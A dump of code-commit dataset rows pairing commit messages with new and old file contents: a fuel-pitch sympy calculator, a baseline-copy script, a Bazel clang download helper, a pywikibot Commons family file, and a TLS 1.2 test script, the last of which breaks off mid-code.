commit stringlengths 40 40 | subject stringlengths 4 1.73k | repos stringlengths 5 127k | old_file stringlengths 2 751 | new_file stringlengths 2 751 | new_contents stringlengths 1 8.98k | old_contents stringlengths 0 6.59k | license stringclasses 13
values | lang stringclasses 23
values |
|---|---|---|---|---|---|---|---|---|
1ace5845055050c0ac3d9e14a5f76ad78f6778bf | Add python script for calculating fuel pitch fraction. | gridley/moltres,arfc/moltres,arfc/moltres,arfc/moltres,arfc/moltres,lindsayad/moltres,lindsayad/moltres,lindsayad/moltres,lindsayad/moltres,gridley/moltres,gridley/moltres,gridley/moltres | python/calc_fuel_pitch_fraction.py | python/calc_fuel_pitch_fraction.py | import sympy as sp
import sys
def calc_spacing(R, n, fuel_fraction=.225):
    """Solve for the ring-width fraction ``x`` giving a target fuel fraction.

    The core of radius ``R`` is modeled as ``n`` alternating fuel/moderator
    rings of pitch ``R/n`` (geometry inferred from the file name — the
    commit adds a "fuel pitch fraction" calculator).  ``x`` scales how far
    each fuel ring extends within its pitch; it is solved so that the fuel
    area ``Af`` over the total area ``Af + Am`` equals ``fuel_fraction``.

    Args:
        R: Core radius.
        n: Number of rings.
        fuel_fraction: Target value of Af / (Af + Am).  Defaults to the
            previously hard-coded 0.225, so existing calls are unchanged.

    Returns:
        List of symbolic solutions for ``x`` as returned by ``sp.solve``.
    """
    x = sp.symbols('x')
    Af = 0  # accumulated fuel area, a polynomial in x
    Am = 0  # accumulated moderator area, a polynomial in x
    # Even m grows a fuel disc out to (m/2 + x) pitches; the following odd m
    # subtracts the inner disc, leaving one fuel annulus per pair.
    for m in range(2*n - 1):
        if m % 2 == 0:
            Af += sp.pi * (R/n * (m/2 + x))**2
        if m % 2 == 1:
            Af -= sp.pi * (R/n * (m+1)/2)**2
    # The complementary alternation accumulates the moderator area.
    for m in range(2*n):
        if m % 2 == 0:
            Am -= sp.pi * (R/n * (m/2 + x))**2
        if m % 2 == 1:
            Am += sp.pi * (R/n * (m+1)/2)**2
    return sp.solve(Af / (Af + Am) - fuel_fraction, x)
print(calc_spacing(float(sys.argv[1]), int(sys.argv[2])))
| lgpl-2.1 | Python | |
975493d0376dd565242718c588ce0d24eca8b923 | add initial script for copying local solutions to the baseline directory | OpenFAST/r-test,OpenFAST/r-test | newBaselineSolutions.py | newBaselineSolutions.py | """
"""
import sys
import os
import shutil
##### Helper functions
def exitWithError(error):
    """Print an error message and abort with a non-zero exit code."""
    print(error)
    sys.exit(1)
def exitWithDirNotFound(dir):
    """Abort, reporting that the given directory does not exist."""
    exitWithError("Directory does not exist: {}\n".format(dir))
def copyBaselineFiles(sourceDir, destinationDir,
                      extensions=(".out", ".outb", ".sum")):
    """Copy solution files from sourceDir into destinationDir.

    Files are selected by suffix.  The previous substring test
    (``t in s``) copied e.g. "case.outb" twice, because ".out" is a
    substring of ".outb"; matching with endswith() fixes that.

    Returns the sorted list of file names that were copied.
    """
    copied = []
    for name in sorted(os.listdir(sourceDir)):
        if name.endswith(tuple(extensions)):
            src = os.path.join(sourceDir, name)
            dst = os.path.join(destinationDir, name)
            print("{} {} {}".format(name, src, dst))
            shutil.copyfile(src, dst)
            copied.append(name)
    return copied
##### Main
def main(argv=None):
    """Entry point: <sourceDir> <targetDir> <machine> <compiler>."""
    argv = sys.argv[1:] if argv is None else argv
    sourceDir, targetDir, machine, compiler = argv[:4]
    destinationDir = os.path.join(targetDir, "{}-{}".format(machine, compiler))
    # verify source directory exists. if not, bail
    if not os.path.isdir(sourceDir):
        exitWithDirNotFound(sourceDir)
    # verify destination directory exists. if not, make it
    if not os.path.isdir(destinationDir):
        os.makedirs(destinationDir)
    copyBaselineFiles(sourceDir, destinationDir)
if __name__ == "__main__":
    main()
| apache-2.0 | Python | |
3646ca1fc66a174d787ffd4a7569f48bc8f23cf5 | Update downladable clang to r335091. | jbedorf/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,karllessard/tensorflow,dancingdan/tensorflow,xzturn/tensorflow,jalexvig/tensorflow,snnn/tensorflow,Bismarrck/tensorflow,aselle/tensorflow,Bismarrck/tensorflow,tensorflow/tensorflow,caisq/tensorflow,frreiss/tensorflow-fred,ppwwyyxx/tensorflow,freedomtan/tensorflow,frreiss/tensorflow-fred,adit-chandra/tensorflow,kevin-coder/tensorflow-fork,tensorflow/tensorflow-pywrap_saved_model,karllessard/tensorflow,annarev/tensorflow,jendap/tensorflow,cxxgtxy/tensorflow,yongtang/tensorflow,aam-at/tensorflow,yongtang/tensorflow,jhseu/tensorflow,ageron/tensorflow,drpngx/tensorflow,yongtang/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,aam-at/tensorflow,DavidNorman/tensorflow,tensorflow/tensorflow,karllessard/tensorflow,tensorflow/tensorflow-pywrap_saved_model,adit-chandra/tensorflow,ageron/tensorflow,dongjoon-hyun/tensorflow,hfp/tensorflow-xsmm,aam-at/tensorflow,petewarden/tensorflow,aselle/tensorflow,asimshankar/tensorflow,jbedorf/tensorflow,seanli9jan/tensorflow,paolodedios/tensorflow,theflofly/tensorflow,ppwwyyxx/tensorflow,tensorflow/tensorflow-pywrap_saved_model,manipopopo/tensorflow,renyi533/tensorflow,dancingdan/tensorflow,petewarden/tensorflow,davidzchen/tensorflow,brchiu/tensorflow,ppwwyyxx/tensorflow,dancingdan/tensorflow,gunan/tensorflow,annarev/tensorflow,jbedorf/tensorflow,kobejean/tensorflow,freedomtan/tensorflow,theflofly/tensorflow,apark263/tensorflow,davidzchen/tensorflow,karllessard/tensorflow,xzturn/tensorflow,dancingdan/tensorflow,aam-at/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,alsrgv/tensorflow,freedomtan/tensorflow,chemelnucfin/tensorflow,Intel-tensorflow/tensorflow,ghchinoy/tensorflow,gunan/tensorflow,renyi533/tensorflow,chemelnucfin/tensorflow,petewarden/tensorflow,girving/tensorflow,theflofly/tensorflow,ghchinoy/tensorflow,xzturn/tensorflow,yongtang/tensorflow
,ZhangXinNan/tensorflow,xzturn/tensorflow,theflofly/tensorflow,theflofly/tensorflow,paolodedios/tensorflow,xodus7/tensorflow,sarvex/tensorflow,kevin-coder/tensorflow-fork,petewarden/tensorflow,ZhangXinNan/tensorflow,alshedivat/tensorflow,asimshankar/tensorflow,jendap/tensorflow,theflofly/tensorflow,freedomtan/tensorflow,kobejean/tensorflow,sarvex/tensorflow,snnn/tensorflow,Intel-tensorflow/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,AnishShah/tensorflow,xodus7/tensorflow,frreiss/tensorflow-fred,xzturn/tensorflow,asimshankar/tensorflow,chemelnucfin/tensorflow,paolodedios/tensorflow,davidzchen/tensorflow,brchiu/tensorflow,yongtang/tensorflow,jalexvig/tensorflow,gunan/tensorflow,ppwwyyxx/tensorflow,aselle/tensorflow,paolodedios/tensorflow,ghchinoy/tensorflow,asimshankar/tensorflow,renyi533/tensorflow,davidzchen/tensorflow,snnn/tensorflow,ppwwyyxx/tensorflow,alshedivat/tensorflow,seanli9jan/tensorflow,ZhangXinNan/tensorflow,karllessard/tensorflow,dongjoon-hyun/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,karllessard/tensorflow,AnishShah/tensorflow,DavidNorman/tensorflow,caisq/tensorflow,drpngx/tensorflow,petewarden/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,seanli9jan/tensorflow,apark263/tensorflow,gautam1858/tensorflow,freedomtan/tensorflow,xodus7/tensorflow,yongtang/tensorflow,drpngx/tensorflow,Intel-tensorflow/tensorflow,davidzchen/tensorflow,annarev/tensorflow,jhseu/tensorflow,girving/tensorflow,hfp/tensorflow-xsmm,xodus7/tensorflow,alshedivat/tensorflow,Bismarrck/tensorflow,theflofly/tensorflow,adit-chandra/tensorflow,DavidNorman/tensorflow,sarvex/tensorflow,brchiu/tensorflow,AnishShah/tensorflow,aselle/tensorflow,davidzchen/tensorflow,aam-at/tensorflow,aselle/tensorflow,Bismarrck/tensorflow,adit-chandra/tensorflow,yongtang/tensorflow,frreiss/tensorflow-fred,ZhangXinNan/tensorflow,petewarden/tensorflow,girving/tensorflow,jendap/tensorflow,gautam1858/tensorflow,chemelnucfin/tensor
flow,arborh/tensorflow,hehongliang/tensorflow,snnn/tensorflow,aldian/tensorflow,Bismarrck/tensorflow,Bismarrck/tensorflow,kobejean/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-pywrap_tf_optimizer,paolodedios/tensorflow,aldian/tensorflow,frreiss/tensorflow-fred,manipopopo/tensorflow,jhseu/tensorflow,seanli9jan/tensorflow,girving/tensorflow,AnishShah/tensorflow,kevin-coder/tensorflow-fork,arborh/tensorflow,alsrgv/tensorflow,chemelnucfin/tensorflow,kobejean/tensorflow,jbedorf/tensorflow,theflofly/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,manipopopo/tensorflow,jbedorf/tensorflow,hfp/tensorflow-xsmm,freedomtan/tensorflow,caisq/tensorflow,hfp/tensorflow-xsmm,tensorflow/tensorflow-pywrap_saved_model,brchiu/tensorflow,chemelnucfin/tensorflow,AnishShah/tensorflow,hfp/tensorflow-xsmm,chemelnucfin/tensorflow,gautam1858/tensorflow,tensorflow/tensorflow,snnn/tensorflow,annarev/tensorflow,adit-chandra/tensorflow,gautam1858/tensorflow,renyi533/tensorflow,jendap/tensorflow,ageron/tensorflow,arborh/tensorflow,ppwwyyxx/tensorflow,caisq/tensorflow,kevin-coder/tensorflow-fork,adit-chandra/tensorflow,caisq/tensorflow,sarvex/tensorflow,gautam1858/tensorflow,karllessard/tensorflow,alsrgv/tensorflow,gautam1858/tensorflow,petewarden/tensorflow,dongjoon-hyun/tensorflow,aam-at/tensorflow,jbedorf/tensorflow,Intel-Corporation/tensorflow,paolodedios/tensorflow,karllessard/tensorflow,Intel-Corporation/tensorflow,gunan/tensorflow,aldian/tensorflow,DavidNorman/tensorflow,hehongliang/tensorflow,apark263/tensorflow,apark263/tensorflow,jart/tensorflow,cxxgtxy/tensorflow,DavidNorman/tensorflow,annarev/tensorflow,brchiu/tensorflow,dancingdan/tensorflow,annarev/tensorflow,alsrgv/tensorflow,manipopopo/tensorflow,kevin-coder/tensorflow-fork,jart/tensorflow,ZhangXinNan/tensorflow,alsrgv/tensorflow,gautam1858/tensorflow,aam-at/tensorflow,AnishShah/tensorflow,jalexvig/tensorflow,jart/tensorflow,snnn/tensorflow,girving/tensorflow,sarvex/tensorflow,Da
vidNorman/tensorflow,jalexvig/tensorflow,gunan/tensorflow,renyi533/tensorflow,tensorflow/tensorflow-pywrap_saved_model,arborh/tensorflow,hehongliang/tensorflow,yongtang/tensorflow,annarev/tensorflow,drpngx/tensorflow,sarvex/tensorflow,ageron/tensorflow,Bismarrck/tensorflow,tensorflow/tensorflow-pywrap_saved_model,ZhangXinNan/tensorflow,arborh/tensorflow,alshedivat/tensorflow,xzturn/tensorflow,apark263/tensorflow,xzturn/tensorflow,frreiss/tensorflow-fred,gautam1858/tensorflow,Intel-tensorflow/tensorflow,manipopopo/tensorflow,frreiss/tensorflow-fred,Intel-Corporation/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow-pywrap_saved_model,drpngx/tensorflow,xodus7/tensorflow,ageron/tensorflow,gunan/tensorflow,jalexvig/tensorflow,ageron/tensorflow,caisq/tensorflow,apark263/tensorflow,dongjoon-hyun/tensorflow,ppwwyyxx/tensorflow,AnishShah/tensorflow,davidzchen/tensorflow,dancingdan/tensorflow,DavidNorman/tensorflow,petewarden/tensorflow,ageron/tensorflow,frreiss/tensorflow-fred,karllessard/tensorflow,tensorflow/tensorflow,frreiss/tensorflow-fred,ghchinoy/tensorflow,gunan/tensorflow,caisq/tensorflow,Bismarrck/tensorflow,xzturn/tensorflow,asimshankar/tensorflow,kevin-coder/tensorflow-fork,jendap/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,apark263/tensorflow,frreiss/tensorflow-fred,cxxgtxy/tensorflow,dancingdan/tensorflow,paolodedios/tensorflow,cxxgtxy/tensorflow,jbedorf/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,jendap/tensorflow,DavidNorman/tensorflow,asimshankar/tensorflow,aam-at/tensorflow,brchiu/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,cxxgtxy/tensorflow,tensorflow/tensorflow-pywrap_saved_model,aldian/tensorflow,arborh/tensorflow,Intel-Corporation/tensorflow,ppwwyyxx/tensorflow,ZhangXinNan/tensorflow,Intel-Corporation/tensorflow,asimshankar/tensorflow,dancingdan/tensorflow,asimshankar/tensorflow,renyi533/tensorflow,hfp/tensorflow-xsmm,ppwwyyxx/tensorflow,arborh/tensorflow,Intel
-Corporation/tensorflow,jhseu/tensorflow,brchiu/tensorflow,tensorflow/tensorflow-pywrap_saved_model,jalexvig/tensorflow,snnn/tensorflow,alsrgv/tensorflow,girving/tensorflow,jart/tensorflow,xodus7/tensorflow,Bismarrck/tensorflow,chemelnucfin/tensorflow,ZhangXinNan/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,kobejean/tensorflow,xzturn/tensorflow,davidzchen/tensorflow,gautam1858/tensorflow,cxxgtxy/tensorflow,yongtang/tensorflow,aselle/tensorflow,adit-chandra/tensorflow,davidzchen/tensorflow,jart/tensorflow,girving/tensorflow,dongjoon-hyun/tensorflow,tensorflow/tensorflow,DavidNorman/tensorflow,dongjoon-hyun/tensorflow,jhseu/tensorflow,jart/tensorflow,ghchinoy/tensorflow,ghchinoy/tensorflow,renyi533/tensorflow,girving/tensorflow,brchiu/tensorflow,ageron/tensorflow,drpngx/tensorflow,davidzchen/tensorflow,asimshankar/tensorflow,renyi533/tensorflow,jbedorf/tensorflow,davidzchen/tensorflow,tensorflow/tensorflow,gautam1858/tensorflow,arborh/tensorflow,dongjoon-hyun/tensorflow,ageron/tensorflow,alshedivat/tensorflow,paolodedios/tensorflow,paolodedios/tensorflow,dongjoon-hyun/tensorflow,kevin-coder/tensorflow-fork,ghchinoy/tensorflow,AnishShah/tensorflow,hehongliang/tensorflow,sarvex/tensorflow,apark263/tensorflow,xzturn/tensorflow,theflofly/tensorflow,drpngx/tensorflow,hehongliang/tensorflow,Intel-tensorflow/tensorflow,jhseu/tensorflow,manipopopo/tensorflow,karllessard/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,dongjoon-hyun/tensorflow,davidzchen/tensorflow,aselle/tensorflow,alshedivat/tensorflow,renyi533/tensorflow,seanli9jan/tensorflow,jbedorf/tensorflow,xodus7/tensorflow,cxxgtxy/tensorflow,annarev/tensorflow,hfp/tensorflow-xsmm,petewarden/tensorflow,jendap/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,alsrgv/tensorflow,sarvex/tensorflow,petewarden/tensorflow,jbedorf/tensorflow,arborh/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,ZhangXinNan/tensorflow,jhseu/tensorflow,gunan/tensorflow,tensorflow/tensorflow,xzturn/tensorf
low,aselle/tensorflow,kobejean/tensorflow,jendap/tensorflow,tensorflow/tensorflow,AnishShah/tensorflow,frreiss/tensorflow-fred,ageron/tensorflow,manipopopo/tensorflow,alshedivat/tensorflow,jart/tensorflow,ppwwyyxx/tensorflow,xodus7/tensorflow,gunan/tensorflow,aam-at/tensorflow,tensorflow/tensorflow,theflofly/tensorflow,drpngx/tensorflow,apark263/tensorflow,dancingdan/tensorflow,seanli9jan/tensorflow,jart/tensorflow,jalexvig/tensorflow,caisq/tensorflow,DavidNorman/tensorflow,manipopopo/tensorflow,freedomtan/tensorflow,ageron/tensorflow,seanli9jan/tensorflow,asimshankar/tensorflow,xodus7/tensorflow,kevin-coder/tensorflow-fork,Intel-tensorflow/tensorflow,renyi533/tensorflow,aselle/tensorflow,karllessard/tensorflow,freedomtan/tensorflow,tensorflow/tensorflow,aam-at/tensorflow,Intel-tensorflow/tensorflow,DavidNorman/tensorflow,freedomtan/tensorflow,jhseu/tensorflow,hehongliang/tensorflow,girving/tensorflow,Intel-tensorflow/tensorflow,jbedorf/tensorflow,alshedivat/tensorflow,tensorflow/tensorflow,ZhangXinNan/tensorflow,hfp/tensorflow-xsmm,chemelnucfin/tensorflow,chemelnucfin/tensorflow,yongtang/tensorflow,renyi533/tensorflow,dongjoon-hyun/tensorflow,renyi533/tensorflow,kobejean/tensorflow,seanli9jan/tensorflow,kobejean/tensorflow,jalexvig/tensorflow,ghchinoy/tensorflow,frreiss/tensorflow-fred,jendap/tensorflow,apark263/tensorflow,seanli9jan/tensorflow,kevin-coder/tensorflow-fork,theflofly/tensorflow,annarev/tensorflow,jart/tensorflow,hfp/tensorflow-xsmm,cxxgtxy/tensorflow,dancingdan/tensorflow,Intel-Corporation/tensorflow,Intel-tensorflow/tensorflow,aselle/tensorflow,Bismarrck/tensorflow,ageron/tensorflow,hehongliang/tensorflow,gunan/tensorflow,tensorflow/tensorflow-pywrap_saved_model,ZhangXinNan/tensorflow,alsrgv/tensorflow,hfp/tensorflow-xsmm,jhseu/tensorflow,jbedorf/tensorflow,petewarden/tensorflow,dancingdan/tensorflow,ghchinoy/tensorflow,arborh/tensorflow,manipopopo/tensorflow,alshedivat/tensorflow,ppwwyyxx/tensorflow,brchiu/tensorflow,Bismarrck/tensorflow,tensorflow
/tensorflow-pywrap_tf_optimizer,gunan/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-pywrap_tf_optimizer,aam-at/tensorflow,alshedivat/tensorflow,jendap/tensorflow,jhseu/tensorflow,girving/tensorflow,kevin-coder/tensorflow-fork,snnn/tensorflow,ghchinoy/tensorflow,brchiu/tensorflow,freedomtan/tensorflow,yongtang/tensorflow,annarev/tensorflow,drpngx/tensorflow,dongjoon-hyun/tensorflow,petewarden/tensorflow,aldian/tensorflow,aam-at/tensorflow,caisq/tensorflow,adit-chandra/tensorflow,adit-chandra/tensorflow,caisq/tensorflow,alsrgv/tensorflow,Intel-tensorflow/tensorflow,snnn/tensorflow,aldian/tensorflow,kobejean/tensorflow,manipopopo/tensorflow,AnishShah/tensorflow,paolodedios/tensorflow,hfp/tensorflow-xsmm,xzturn/tensorflow,xodus7/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,alshedivat/tensorflow,ghchinoy/tensorflow,kobejean/tensorflow,drpngx/tensorflow,arborh/tensorflow,jendap/tensorflow,jalexvig/tensorflow,apark263/tensorflow,kobejean/tensorflow,adit-chandra/tensorflow,snnn/tensorflow,chemelnucfin/tensorflow,xodus7/tensorflow,gunan/tensorflow,arborh/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,paolodedios/tensorflow,adit-chandra/tensorflow,freedomtan/tensorflow,adit-chandra/tensorflow,gautam1858/tensorflow,ppwwyyxx/tensorflow,jhseu/tensorflow,jalexvig/tensorflow,brchiu/tensorflow,aldian/tensorflow,alsrgv/tensorflow,jalexvig/tensorflow,seanli9jan/tensorflow,jart/tensorflow,AnishShah/tensorflow,gautam1858/tensorflow,Intel-tensorflow/tensorflow,freedomtan/tensorflow,alsrgv/tensorflow,annarev/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,aselle/tensorflow,kevin-coder/tensorflow-fork,jhseu/tensorflow,DavidNorman/tensorflow,aldian/tensorflow,alsrgv/tensorflow,manipopopo/tensorflow,chemelnucfin/tensorflow,seanli9jan/tensorflow,theflofly/tensorflow,snnn/tensorflow,Intel-Corporation/tensorflow,asimshankar/tensorflow,ghchinoy/tensorflow,girving/tensorflow | 
third_party/clang_toolchain/download_clang.bzl | third_party/clang_toolchain/download_clang.bzl | """ Helpers to download a recent clang release."""
def _get_platform_folder(os_name):
os_name = os_name.lower()
if os_name.startswith('windows'):
return 'Win'
if os_name.startswith('mac os'):
return 'Mac'
if not os_name.startswith('linux'):
fail('Unknown platform')
return 'Linux_x64'
def _download_chromium_clang(repo_ctx, platform_folder, package_version, sha256,
out_folder):
cds_url = 'https://commondatastorage.googleapis.com/chromium-browser-clang'
cds_file = 'clang-%s.tgz' % package_version
cds_full_url = '{0}/{1}/{2}'.format(cds_url, platform_folder, cds_file)
repo_ctx.download_and_extract(cds_full_url, output=out_folder, sha256=sha256)
def download_clang(repo_ctx, out_folder):
  """ Download a fresh clang release and put it into out_folder.
  Clang itself will be located in 'out_folder/bin/clang'.
  We currently download one of the latest releases of clang by the
  Chromium project (see
  https://chromium.googlesource.com/chromium/src/+/master/docs/clang.md).
  Args:
    repo_ctx: An instance of repository_context object.
    out_folder: A folder to extract the compiler into.
  """
  # TODO(ibiryukov): we currently download and extract some extra tools in the
  # clang release (e.g., sanitizers). We should probably remove the ones
  # we don't need and document the ones we want provide in addition to clang.
  # The latest CLANG_REVISION and CLANG_SUB_REVISION of the Chromiums's release
  # can be found in https://chromium.googlesource.com/chromium/src/tools/clang/+/master/scripts/update.py
  clang_revision = '335091'
  clang_sub_revision = 1
  package_version = '{}-{}'.format(clang_revision, clang_sub_revision)
  # Expected SHA-256 digests of the per-platform packages for this revision.
  checksums = {
      'Linux_x64':
          '17002b75293fccfdd175eacdc9ee47d97b58d7e98fef343384fbbef1b68ce99f',
      'Mac':
          '9351e46d28315daaa06a1eb55bd0370ed4aaeb693a2a3e82e48d2737d7723468',
      'Win':
          'e78a1e469224d6f6751b4df4374bf58893ac03900ec924e4c8264888ba4aeb1e',
  }
  platform = _get_platform_folder(repo_ctx.os.name)
  _download_chromium_clang(repo_ctx, platform, package_version,
                           checksums[platform], out_folder)
| """ Helpers to download a recent clang release."""
def _get_platform_folder(os_name):
  """Return the Chromium CDS folder name for the given os.name string."""
  # Normalize so the prefix checks below are case-insensitive.
  os_name = os_name.lower()
  if os_name.startswith('windows'):
    return 'Win'
  if os_name.startswith('mac os'):
    return 'Mac'
  # Anything that is not Windows/Mac must be Linux; otherwise abort.
  if not os_name.startswith('linux'):
    fail('Unknown platform')
  return 'Linux_x64'
def _download_chromium_clang(repo_ctx, platform_folder, package_version, sha256,
                             out_folder):
  """Download and extract one clang package from Chromium's storage.

  Args:
    repo_ctx: repository context used to perform the download.
    platform_folder: CDS folder name ('Win', 'Mac' or 'Linux_x64').
    package_version: '<revision>-<sub-revision>' version string.
    sha256: expected SHA-256 digest of the tarball.
    out_folder: directory the archive is extracted into.
  """
  cds_url = 'https://commondatastorage.googleapis.com/chromium-browser-clang'
  cds_file = 'clang-%s.tgz' % package_version
  cds_full_url = '{0}/{1}/{2}'.format(cds_url, platform_folder, cds_file)
  repo_ctx.download_and_extract(cds_full_url, output=out_folder, sha256=sha256)
def download_clang(repo_ctx, out_folder):
  """ Download a fresh clang release and put it into out_folder.
  Clang itself will be located in 'out_folder/bin/clang'.
  We currently download one of the latest releases of clang by the
  Chromium project (see
  https://chromium.googlesource.com/chromium/src/+/master/docs/clang.md).
  Args:
    repo_ctx: An instance of repository_context object.
    out_folder: A folder to extract the compiler into.
  """
  # TODO(ibiryukov): we currently download and extract some extra tools in the
  # clang release (e.g., sanitizers). We should probably remove the ones
  # we don't need and document the ones we want provide in addition to clang.
  # Latest CLANG_REVISION and CLANG_SUB_REVISION of the Chromiums's release
  # can be found in https://chromium.googlesource.com/chromium/src/tools/clang/+/master/scripts/update.py
  CLANG_REVISION = '334100'
  CLANG_SUB_REVISION = 1
  package_version = '%s-%s' % (CLANG_REVISION, CLANG_SUB_REVISION)
  # Expected SHA-256 digests of the per-platform packages for this revision.
  checksums = {
      'Linux_x64':
          '3c57420b591601cd14b5babd74b58fcaefa877112938d70cca6f0a1b0b293ab4',
      'Mac':
          '97d313996fb97a6138635f963d7ef4efa9f028a8168bb7917cc428b9eab05ebb',
      'Win':
          '52c1d6d20a0733276597f4ced59d18b545769dbf8beb8c6bdc26a7a862da7fc9',
  }
  # Pick the package for the host platform and fetch/verify/extract it.
  platform_folder = _get_platform_folder(repo_ctx.os.name)
  _download_chromium_clang(repo_ctx, platform_folder, package_version,
                           checksums[platform_folder], out_folder)
| apache-2.0 | Python |
bfd85c18e788c4e89569f7a35fa85d80d3bcd031 | Add the IPython version helper | astrofrog/reducer,astrofrog/reducer,StuartLittlefair/reducer,StuartLittlefair/reducer,mwcraig/reducer | reducer/ipython_version_helper.py | reducer/ipython_version_helper.py | from __future__ import (division, print_function, absolute_import,
unicode_literals)
from IPython import version_info
def ipython_version_as_string():
    """Return IPython's (major, minor, patch) concatenated as one string.

    ``version_info`` is a tuple like (major, minor, patch, vendor); only
    the first three fields are used, e.g. (4, 1, 2, '') -> "412".
    """
    major, minor, patch = version_info[:3]
    return '{}{}{}'.format(major, minor, patch)
| bsd-3-clause | Python | |
cd7822eb0017a59e71fb98e395228f891282082f | Revert r10641 | smalyshev/pywikibot-core,PersianWikipedia/pywikibot-core,wikimedia/pywikibot-core,Darkdadaah/pywikibot-core,h4ck3rm1k3/pywikibot-core,hasteur/g13bot_tools_new,jayvdb/pywikibot-core,icyflame/batman,valhallasw/pywikibot-core,emijrp/pywikibot-core,hasteur/g13bot_tools_new,happy5214/pywikibot-core,magul/pywikibot-core,happy5214/pywikibot-core,h4ck3rm1k3/pywikibot-core,wikimedia/pywikibot-core,jayvdb/pywikibot-core,xZise/pywikibot-core,hasteur/g13bot_tools_new,darthbhyrava/pywikibot-local,VcamX/pywikibot-core,TridevGuha/pywikibot-core,trishnaguha/pywikibot-core,npdoty/pywikibot,npdoty/pywikibot,Darkdadaah/pywikibot-core,magul/pywikibot-core | pywikibot/families/commons_family.py | pywikibot/families/commons_family.py | # -*- coding: utf-8 -*-
__version__ = '$Id$'
from pywikibot import family
# The Wikimedia Commons family
class Family(family.Family):
    """Wiki family definition for Wikimedia Commons (single 'commons' site)."""
    def __init__(self):
        family.Family.__init__(self)
        self.name = 'commons'
        # Only one "language": the Commons wiki itself.
        self.langs = {
            'commons': 'commons.wikimedia.org',
        }
        # Unprefixed interwiki links on Commons are forwarded to Wikipedia.
        self.interwiki_forward = 'wikipedia'
        # Templates that mark a category as redirected to another category.
        self.category_redirect_templates = {
            'commons': (u'Category redirect',
                        u'Categoryredirect',
                        u'Synonym taxon category redirect',
                        u'Invalid taxon category redirect',
                        u'Monotypic taxon category redirect',
                        u'See cat',
                        u'Seecat',
                        u'See category',
                        u'Catredirect',
                        u'Cat redirect',
                        u'Cat-red',
                        u'Catredir',
                        u'Redirect category'),
        }
        # Name of the disambiguation category on Commons.
        self.disambcatname = {
            'commons': u'Disambiguation'
        }
        # Projects Commons accepts cross-project links to.
        self.cross_projects = [
            'wikipedia', 'wiktionary', 'wikibooks', 'wikiquote', 'wikisource', 'wikinews', 'wikiversity',
            'meta', 'mediawiki', 'test', 'incubator', 'species',
        ]
    def dbName(self, code):
        """Return the database name for Commons (``code`` is ignored)."""
        return 'commonswiki_p'
    def shared_image_repository(self, code):
        """Commons is its own shared image repository."""
        return ('commons', 'commons')
    def ssl_pathprefix(self, code):
        """Return the URL path prefix used when accessing the site over SSL."""
        return "/wikipedia/commons"
| # -*- coding: utf-8 -*-
__version__ = '$Id$'
from pywikibot import family
# The Wikimedia Commons family
class Family(family.Family):
    """Wiki family definition for Wikimedia Commons (single 'commons' site)."""
    def __init__(self):
        family.Family.__init__(self)
        self.name = 'commons'
        # Only one "language": the Commons wiki itself.
        self.langs = {
            'commons': 'commons.wikimedia.org',
        }
        # Unprefixed interwiki links on Commons are forwarded to Wikipedia.
        self.interwiki_forward = 'wikipedia'
        # Templates that mark a category as redirected to another category.
        self.category_redirect_templates = {
            'commons': (u'Category redirect',
                        u'Categoryredirect',
                        u'Synonym taxon category redirect',
                        u'Invalid taxon category redirect',
                        u'Monotypic taxon category redirect',
                        u'See cat',
                        u'Seecat',
                        u'See category',
                        u'Catredirect',
                        u'Cat redirect',
                        u'Cat-red',
                        u'Catredir',
                        u'Redirect category'),
        }
        # Name of the disambiguation category on Commons.
        self.disambcatname = {
            'commons': u'Disambiguation'
        }
        # Projects Commons accepts cross-project links to.
        self.cross_projects = [
            'wikipedia', 'wiktionary', 'wikibooks', 'wikiquote', 'wikisource', 'wikinews', 'wikiversity',
            'meta', 'mediawiki', 'test', 'incubator', 'species',
        ]
    def dbName(self, code):
        """Return the database name for Commons (``code`` is ignored)."""
        return 'commonswiki_p'
    def ssl_pathprefix(self, code):
        """Return the URL path prefix used when accessing the site over SSL."""
        return "/wikipedia/commons"
| mit | Python |
f110fdd778b450a0bed2b8bfb68f12648c4fd3e7 | add base_tester.py | clburlison/vendored,clburlison/vendored | tests/base_tester.py | tests/base_tester.py | # -*- coding: utf-8 -*-
"""
This is a utility script designed to allow you to run either py2 or py3 via:
/some/path/to/python base_tester.py
in order to verify TLS 1.2 support and the version of openssl that python is
linked against.
Thank you to Hanno Böck for providing https://fancyssl.hboeck.de/ for free.
"""
# standard libs
from __future__ import print_function
import sys
# patched ssl using tlsssl
# Prefer the tlsssl backport when available; otherwise fall back to the
# standard library's ssl module under the same name.
try:
    import tlsssl as ssl
except(ImportError):
    import ssl
PY_VER = sys.version_info
print("Our python is located: {}".format(sys.executable))
print("Our python version: {}.{}.{}".format(PY_VER[0], PY_VER[1], PY_VER[2]))
print("Our openssl is: {}".format(ssl.OPENSSL_VERSION))
print("------------------------------------------------------------------")
# Default context; the fancyssl test site is used to verify TLS 1.2 support
# (see the module docstring above).
ctx = ssl.create_default_context()
if PY_VER[0] == 2:
    import urllib2
    try:
        a = urllib2.urlopen('https://fancyssl.hboeck.de/', context=ctx)
        print(a)
        print("SUCCESS: Connection was made using TLS1.2")
    except(urllib2.URLError) as e:
        print("ERROR: {}".format(e.reason))
if PY_VER[0] == 3:
    # NOTE(review): urllib.error is only reachable because importing
    # urllib.request pulls it in as a side effect — confirm if targeting
    # non-CPython interpreters.
    import urllib.request
    try:
        a = urllib.request.urlopen('https://fancyssl.hboeck.de/', context=ctx)
